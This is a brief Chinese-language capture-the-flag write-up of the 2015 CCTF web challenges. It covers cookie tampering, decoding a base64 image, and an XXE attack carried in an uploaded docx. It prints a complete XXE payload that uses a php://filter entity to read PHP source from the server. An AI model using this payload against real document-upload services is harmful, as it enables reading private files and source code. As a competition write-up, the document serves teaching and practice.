2015 CCTF Web Write Up

都说phpspy坑!!! 哪里有( ´◔ ‸◔`)。

  • WEB50 circle 直接改Cookie count=72

然后一直跟着转 就能得到一串base64 > >看到/9j/4AAxxxx

这个格式是一张base64编码过的图片

直接mb_ereg

  • WEB300 根据提示 IDE 而且网站又是php 然后存在安全隐患。。Orz我觉得是比较容易想出来是phpstorm的。。
    主要考的就是Phpstorm+xxe PhpStorm是因为我们学校还是蛮多人用这个来写Php项目的。。。
    XXE是最近一直都很火的一个方面0.0
    Phpstorm 项目部署文件(.idea/workspace.xml)
    附上一个XXE构造好的完整payload

    <?xml version=“1.0” encoding=“UTF-8” standalone=“no” ?> <!DOCTYPE w[<!ENTITY xxe SYSTEM “php://filter/read=convert.base64- encode/resource=PhpStorm_Will_Soooooo_Bad.php” >]> /w:pPr/w:rPr&xxe;/w:t/w:r/w:p/w:sectPr/w:body/w:document

    保存为word/document.xml 改成docx就可以上传了
    附上一个很详细的PPT
    PPT

  • WEB400 参考Ricter菊居的Writeup
    cctf.zip

  • comments powered by Disqus